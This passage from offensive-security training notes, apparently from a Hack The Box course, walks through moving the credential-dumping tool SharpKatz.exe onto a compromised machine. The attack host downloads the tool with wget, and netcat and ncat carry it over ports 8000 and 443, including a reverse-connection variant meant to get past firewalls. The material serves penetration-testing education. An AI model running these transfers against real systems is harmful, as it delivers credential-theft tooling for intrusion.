<aside>
</aside>
In this example, we'll transfer SharpKatz.exe from our Pwnbox onto the compromised machine. We'll do it using two methods. Let's work through the first one.
victim@target:~$ # Example using Original Netcatvictim@target:~$ nc -l -p 8000 > SharpKatz.exe
If the compromised machine is using Ncat, we'll need to specify --recv-only to close the connection once the file transfer is finished.
victim@target:~$ # Example using Ncatvictim@target:~$ ncat -l -p 8000 --recv-only > SharpKatz.exe
From our attack host, we'll connect to the compromised machine on port 8000 using Netcat and send the file SharpKatz.exe as input to Netcat. The option -q 0 will tell Netcat to close the connection once it finishes. That way, we'll know when the file transfer was completed.
0xWALY@htb[/htb]$ wget -q <https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe0xWALY@htb[/htb]$> # Example using Original Netcat0xWALY@htb[/htb]$ nc -q 0 192.168.49.128 8000 < SharpKatz.exe
By utilizing Ncat on our attacking host, we can opt for --send-only rather than -q. The --send-only flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted. Typically, Ncat would continue running until the network connection is closed, as the remote side may transmit additional data. However, with --send-only, there is no need to anticipate further incoming information.
0xWALY@htb[/htb]$ wget -q <https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe0xWALY@htb[/htb]$> # Example using Ncat0xWALY@htb[/htb]$ ncat --send-only 192.168.49.128 8000 < SharpKatz.exe
Instead of listening on our compromised machine, we can connect to a port on our attack host to perform the file transfer operation. This method is useful in scenarios where there's a firewall blocking inbound connections. Let's listen on port 443 on our Pwnbox and send the file SharpKatz.exe as input to Netcat.
0xWALY@htb[/htb]$ # Example using Original Netcat0xWALY@htb[/htb]$ sudo nc -l -p 443 -q 0 < SharpKatz.exe
victim@target:~$ # Example using Original Netcatvictim@target:~$ nc 192.168.49.128 443 > SharpKatz.exe
Let's do the same with Ncat: